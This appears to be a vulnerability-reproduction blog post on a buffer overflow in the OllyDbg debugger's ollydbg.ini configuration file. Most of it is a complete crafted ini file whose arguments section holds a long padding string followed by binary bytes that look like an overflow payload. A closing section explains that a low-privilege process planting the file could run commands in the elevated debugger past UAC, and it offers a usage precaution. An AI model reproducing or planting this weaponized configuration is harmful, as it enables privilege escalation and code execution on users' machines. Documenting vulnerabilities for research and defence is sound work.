Extra space between arguments=0
Show default segments=1
NEAR jump modifiers=0
Use short form of string commands=0
Use RET instead of RETN=0
Size sensitive mnemonics=1
SSE size decoding mode=0
Top of FPU stack=1
Always show memory size=1
Decode registers for any IP=1
Show symbolic addresses=1
Show local module names=1
Gray data used as filling=1
Show jump direction=1
Show jump path=1
Show jumpfrom path=1
Show path if jump is not taken=1
Underline fixups=1
Center FOLLOWed command=1
Show stack frames=1
Show local names in stack=1
Extended stack trace=1
Synchronize source with CPU=1
Include SFX extractor in code=0
SFX trace mode=0
Use real SFX entry from previous run=1
Ignore SFX exceptions=1
First pause=1
Stop on new DLL=0
Stop on DLL unload=0
Stop on new thread=0
Stop on thread end=0
Stop on debug string=0
Decode SSE registers=0
Enable last error=1
Ignore access violations in KERNEL32=1
Ignore INT3=1
Ignore TRAP=1
Ignore access violations=1
Step in unknown commands=1
Ignore division by 0=1
Ignore illegal instructions=1
Ignore all FPU exceptions=1
Warn when frequent breaks=0
Warn when break not in code=0
Autoreturn=0
Save original command in trace=1
Show traced ESP=1
Show traced flags=1
Animate over system DLLs=1
Trace over string commands=0
Synchronize CPU and Run trace=1
Ignore custom exceptions=1
Smart update=1
Set high priority=1
Append arguments=1
Use ExitProcess=1
Allow injection to get WinProc=0
Sort WM_XXX by name=0
Type of last WinProc breakpoint=0
Snow-free drawing=0
Demangle symbolic names=1
Keep ordinal in name=1
Only ASCII printable in dump=0
Allow diacritical symbols=0
String decoding=3
Warn if not administrator=0
Warn when terminating process=0
Align dialogs=1
Use font of calling window=0
Specified dialog font=0
Number of lines that follow EIP=0
Restore window positions=1
Restore width of columns=0
Highlight sorted column=0
Compress analysis data=1
Backup UDD files=1
Fill rest of command with NOPs=1
Reference search mode=0
Global search=1
Aligned search=1
Allow error margin=0
Keep size of hex edit selection=1
Modify tag of FPU register=1
Hex inspector limits=1
MMX display mode=0
Last selected options card=5
Last selected appearance card=3
Ignore case in text search=1
Letter key in Disassembler=1
Looseness of code analysis=1
Decode pascal strings=1
Guess number of arguments=1
Accept far calls and returns=1
Accept direct segment modifications=1
Decode VxD calls=1
Accept privileged commands=1
Accept I/O commands=1
Accept NOPs=1
Accept shifts out of range=1
Accept superfluous prefixes=1
Accept LOCK prefixes=1
Accept unaligned stack operations=1
Accept non-standard command forms=1
Show ARG and LOCAL in procedures=1
Save analysis to file=1
Analyse main module automatically=1
Analyse code structure=1
Decode ifs as switches=1
Save trace to file=0
Trace contents of registers=1
Functions preserve registers=0
Decode tricks=1
Automatically select register type=1
Show decoded arguments=1
Show decoded arguments in stack=1
Show arguments in call stack=1
Show induced calls=1
Label display mode=0
Label includes module name=1
Highlight symbolic labels=1
Highlight RETURNs in stack=1
Ignore path in user data file=1
Ignore timestamp in user data file=1
Ignore CRC in user data file=1
Default sort mode in Names=1
Save out-of-module user data=0
Tabulate columns in log file=0
Append data to existing log file=0
Flush gathered data to log file=0
Skip spaces in source comments=1
Hide non-existing source files=1
Tab stops=8
File graph mode=2
Show internal handle names=0
Hide irrelevant handles=0
[Plugin ODbgScript]
Restore Script window=0
Restore Script Log=0
BP_0001=
恢复脚本窗口
=0
还原脚本日志
=0
恢复脚本窗口
=0
还原脚本日志
=0
恢复脚本窗口
=0
还原脚本日志
=0
恢复脚本窗口
=0
还原脚本日志
=0
恢复脚本窗口
=0
还原脚本日志
=0
还原脚本窗口=0
还原脚本日志=0
MRU1=C:\Users\lenovo\Desktop\od.txt
MRU2=
MRU3=
MRU4=
MRU5=
ScriptDir=C:\Users\lenovo\Desktop\od.txt
BP_FILE=C:\Users\lenovo\Desktop\od.txt
[System]
Options position=134,126
Call DLL position=20,89
[Plugin IDAFicator]
Custom Scheme=0,8388608,32768,8421376,128,8388736,32896,12632256,8421504,16711680,65280,16776960,255,16711935,65535,16777215,12639424,15780004,15793151,10789024
disableClickJmp=1
DIA MAC x=0
DIA MAC y=0
DIA HWBP x=0
DIA HWBP y=0
Custom BP list=NonaWrite
disasmCode=0
PATH_RADASM=C:\吾爱破解专用版Ollydbg\plugin\minimalist-radasm
PATH_HELP=C:\吾爱破解专用版Ollydbg\plugin\IDAFICATOR.hlp
SETTINGS_MSEC=500
DIA_CUSTOMIZE_SCHEME=0,8388608,32768,8421376,128,8388736,32896,12632256,8421504,16711680,65280,16776960,255,16711935,65535,16777215,12639424,15780004,15793151,10789024
SETTINGS_MAIN=1,1,1,1,1
SETTINGS_DUMP=
SETTINGS_DISASM=1,0,0
SETTINGS_STACK=
SETTINGS_HWBP=0,0,0
SETTINGS_ROTE=
LAYOUT_ID=0
LAYOUT_SWAP_DUMP_STACK=0
SETTINGS_COMPILER=0
DIA_ROTE_POS=-4,-4,1032,746
MNU_PATHS_DIRS_N=0
MNU_PATHS_FILES_N=0
[Plugin 超级字串参考]
Restore UStrRef Window=1
[Placement]
OllyTest=434,64,1219,623,1
CPU=35,302,1027,472,3
CPU subwindows=601,1459,595,1459,583,1155,518,1179
超级字串参考=22,29,618,230,1
Executable modules=0,0,162,45,1
Memory map=0,0,162,45,1
Log data=282,17,312,45,1
Threads=0,0,162,45,1
Windows=0,0,162,45,1
Handles=132,16,547,437,1
Patches=278,0,312,45,1
Call stack=137,16,312,45,1
Source=44,58,372,274,1
References=0,0,162,45,1
Breakpoints=0,0,162,45,1
中文搜索引擎=278,38,312,57,1
Call tree=0,0,312,45,1
脚本运行窗口=193,89,201,45,1
Watch expressions=99,37,540,230,1
Source files=66,87,474,230,1
Run trace=22,29,432,230,1
SEH chain=88,116,270,230,1
CPU subwindows 1=374,767,336,658,450,960,388,853
CPU subwindows 2=374,767,336,658,450,960,388,853
CPU subwindows 3=374,767,336,658,450,960,388,853
CPU subwindows 4=374,767,336,658,450,960,388,853
[Colours]
Scheme[0]=10,12,18,0,5,15,13,13
Scheme name[0]=Dave's black
Scheme[1]=1,5,0,18,7,18,4,12
Scheme name[1]=Fancy Nico
Scheme[2]=7,12,7,10,11,7,3,13
Scheme name[2]=Kostya's blue
Scheme[3]=7,12,7,0,5,15,18,13
Scheme name[3]=Dami's black
Scheme[4]=0,12,8,18,7,8,7,13
Scheme name[4]=Scheme 4
Scheme[5]=14,12,7,1,3,7,3,13
Scheme name[5]=Scheme 5
Scheme[6]=1,12,3,11,14,2,7,13
Scheme name[6]=Scheme 6
Scheme[7]=15,12,7,0,8,11,7,13
Scheme name[7]=Scheme 7
[Fonts]
Font[0]=16,8,400,0,0,0,134,2,49,0
Face name[0]=Terminal
Font name[0]=OEM 等宽字体
Font[1]=-12,0,400,0,0,0,134,1,49,0
Face name[1]=新宋体
Font name[1]=Terminal 6
Font[2]=16,8,400,0,0,0,134,2,49,0
Face name[2]=Fixedsys
Font name[2]=系统等宽字体
Font[3]=14,0,400,0,0,0,1,2,5,0
Face name[3]=Courier New
Font name[3]=Courier (UNICODE)
Font[4]=10,6,400,0,0,0,1,2,5,0
Face name[4]=Lucida Console
Font name[4]=Lucida (UNICODE)
Font[5]=9,6,700,0,0,0,255,0,48,0
Face name[5]=Terminal
Font name[5]=字体 5
Font[6]=16,8,400,0,0,0,134,2,49,0
Face name[6]=Fixedsys
Font name[6]=字体 6
Font[7]=14,0,400,0,0,0,1,2,5,0
Face name[7]=Courier New
Font name[7]=字体 7
[Syntax]
Commands[1]=10,7,12,12,14,12,12,13,96,7,14,0,0,0
Operands[1]=1,7,7,7,13,14,10,11,0,0,0,0,0,0
Scheme name[1]=Dave
Commands[2]=1,1,1,1,1,1,1,4,109,12,12,0,0,0
Operands[2]=1,1,2,4,12,2,2,5,0,0,0,0,0,0
Scheme name[2]=Fancy Nico
Commands[3]=14,4,124,124,9,110,64,13,111,8,12,0,0,0
Operands[3]=1,10,4,13,11,13,15,6,0,0,0,0,0,0
Scheme name[3]=Kostya's xmas tree
Commands[4]=7,7,2,12,6,12,10,13,96,7,14,0,0,0
Operands[4]=1,7,7,7,13,7,10,11,0,0,0,0,0,0
Scheme name[4]=Dami
Commands[5]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
Operands[5]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
Scheme name[5]=No highlighting
Commands[0]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
Operands[0]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
Scheme name[0]=No highlighting
[Arguments]
Executable[1]=
Executable[2]=
Executable[3]=
Executable[4]=
Executable[5]=
Executable[0]=
[Appearance]
CPU scheme=3
CPU Disassembler=2,3,0,0,3
CPU Dump=2,3,1,0,4353,0
CPU Stack=2,3,0,0
CPU Info=2,3,0,0
CPU Registers=2,3,1,0
超级字串参考=1,0,1,0,0
Executable modules=1,0,1,0,0
Memory map=1,0,1,0,0
Log data=1,0,1,0,0
Threads=1,0,1,0,0
Windows=1,0,1,0,0
Handles=1,0,1,0,0
Patches=1,0,1,0,0
Call stack=1,0,1,0,0
Source=1,0,0,0,0
References=1,0,1,0,0
Breakpoints=1,0,1,0,0
中文搜索引擎=1,0,1,0,0
Call tree=1,0,1,0,0
脚本运行窗口=1,0,1,0,0
Watch expressions=1,0,1,0,0
Source files=1,0,1,0,0
Run trace=1,0,1,0,0
SEH chain=1,0,1,0,0
[Columns]
CPU Disassembler=72,136,320,2048
CPU Dump=72,384,136,
CPU Stack=72,80,2048,
超级字串参考=54,240,1536
Executable modules=54,54,54,54,223,1536
Memory map=54,54,54,54,72,30,48,48,1536
Log data=54,1536
Threads=54,54,66,108,60,54,72,72
Windows=78,192,54,54,54,54,54,54,54,1536
Handles=54,90,36,54,18,72,1536
Patches=54,30,48,192,192,1536
Call stack=54,54,216,168,54
Source=48,1536
References=54,240,1536
Breakpoints=54,54,150,216,1536
中文搜索引擎=54,240,1536
Call tree=192,192,192,192
脚本运行窗口=30,240,90,54,600
Watch expressions=216,1536
Source files=54,96,1536
Run trace=54,54,54,54,192,1536
SEH chain=54,192
[Plugin StrongOD]
CreateProcessMode=0
HidePEB=1
IsPatchFloat=1
IsAdvGoto=0
KernelMode=1
KillPEBug=1
SuperEnumMod=1
AdvAttach=1
SkipExpection=1
OrdFirst=0
BreakOnLdr=0
BreakOnTls=1
RemoveEpOneShot=1
ShowBar=17
LoadSym=0
AutoUpdate=0
HideWindow=1
HideProcess=1
ProtectProcess=1
DriverKey=-514523012
DriverName=Rockey5U
UpdateURL=
[Plugin 中文搜索引擎]
Restore UStrRef Window=1
[Import libraries]
Implib[0]=C:\吾爱破解专用版Ollydbg\LIB\MFC42.Lib
Implib[1]=C:\吾爱破解专用版Ollydbg\LIB\mfc42d.lib
Implib[2]=C:\吾爱破解专用版Ollydbg\LIB\mfc42u.lib
Implib[3]=C:\吾爱破解专用版Ollydbg\LIB\mfc42ud.lib
Implib[4]=C:\吾爱破解专用版Ollydbg\LIB\mfc71.Lib
Implib[5]=C:\吾爱破解专用版Ollydbg\LIB\mfc71d.lib
Implib[6]=C:\吾爱破解专用版Ollydbg\LIB\mfc71u.lib
Implib[7]=C:\吾爱破解专用版Ollydbg\LIB\mfc71ud.lib
Implib[8]=C:\吾爱破解专用版Ollydbg\LIB\mfc80.lib
Implib[9]=C:\吾爱破解专用版Ollydbg\LIB\mfc80d.lib
Implib[10]=C:\吾爱破解专用版Ollydbg\LIB\mfc80u.lib
Implib[11]=C:\吾爱破解专用版Ollydbg\LIB\mfc80ud.lib
Implib[12]=C:\吾爱破解专用版Ollydbg\LIB\mfcd42d.lib
Implib[13]=C:\吾爱破解专用版Ollydbg\LIB\mfcd42ud.lib
Implib[14]=C:\吾爱破解专用版Ollydbg\LIB\mfcn42d.lib
Implib[15]=C:\吾爱破解专用版Ollydbg\LIB\mfcn42ud.lib
Implib[16]=C:\吾爱破解专用版Ollydbg\LIB\mfco42d.lib
Implib[17]=C:\吾爱破解专用版Ollydbg\LIB\mfco42ud.lib
Implib[18]=C:\吾爱破解专用版Ollydbg\LIB\MSVBVM50.lib
Implib[19]=C:\吾爱破解专用版Ollydbg\LIB\msvbvm60.lib
Implib[20]=C:\吾爱破解专用版Ollydbg\LIB\msvcp60.lib
Implib[21]=C:\吾爱破解专用版Ollydbg\LIB\msvcp71.lib
Implib[22]=C:\吾爱破解专用版Ollydbg\LIB\msvcp80.lib
Implib[23]=C:\吾爱破解专用版Ollydbg\LIB\MSVCR70.lib
Implib[24]=C:\吾爱破解专用版Ollydbg\LIB\msvcr71.lib
Implib[25]=C:\吾爱破解专用版Ollydbg\LIB\msvcr80.lib
Implib[26]=C:\吾爱破解专用版Ollydbg\LIB\msvcrt.lib
Implib[27]=C:\吾爱破解专用版Ollydbg\LIB\comctl32.lib
Implib[28]=C:\吾爱破解专用版Ollydbg\LIB\dbgeng.lib
Implib[29]=C:\吾爱破解专用版Ollydbg\LIB\dbghelp.lib
Implib[30]=C:\吾爱破解专用版Ollydbg\LIB\kernel32.lib
Implib[31]=C:\吾爱破解专用版Ollydbg\LIB\ntdll.lib
Implib[32]=C:\吾爱破解专用版Ollydbg\LIB\oleaut32.lib
Implib[33]=C:\吾爱破解专用版Ollydbg\LIB\oledlg.lib
Implib[34]=C:\吾爱破解专用版Ollydbg\LIB\ollydbg.lib
Implib[35]=C:\吾爱破解专用版Ollydbg\LIB\ws2_32.lib
Implib[36]=C:\吾爱破解专用版Ollydbg\LIB\wsock32.lib
[Plugin ILLY]
AutoRun=0
[参数]
参数[0]=123123
参数[1]=""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo\CAAAAAAAAAAAAAAAA谏浸鐜_賢$鬪)杀11n冾?n?{zH刓? 顾lj蓒]鵁w? Zy;パ_r6I?磹瘐匷髀囦蘙Zg砚 ??翗蒳?HC/糠蹠i?9T'證悘6桁礎/廰谴7??夷僲既《魺D}踒??鋫n3鰉螒|?ㄞ哨>e枯@f锏q韅翇$?l??d蒖<睮W糀Q?瘴?梆`憭绯y{??""
Argument[1]=1
Argument[0]=123123
[Exceptions]
Custom[0]=00000000,FFFFFFFF

Impact

On Windows 7 and later, OllyDbg is normally launched through a UAC prompt, so a low-privilege process that can write ollydbg.ini next to the debugger would have its payload run inside the elevated debugger the next time the Arguments dialog is used. In that sense the bug looks usable for executing arbitrary commands past UAC.

Taken as a whole, though, the trigger conditions are fairly restrictive, so the practical exploitation value is not high.

When using OllyDbg day to day, avoid the Arguments feature where you can; when you must use it, open the drop-down first and check for any unusual entries.

  • Title: OllyDBG ollydbg.ini 缓冲区溢出漏洞复现
  • Author: Catalpa
  • Created at : 2020-02-25 00:00:00
  • Updated at : 2024-10-17 08:51:52
  • Link: https://wzt.ac.cn/2020/02/25/ODBUG/
  • License: This work is licensed under CC BY-NC-SA 4.0.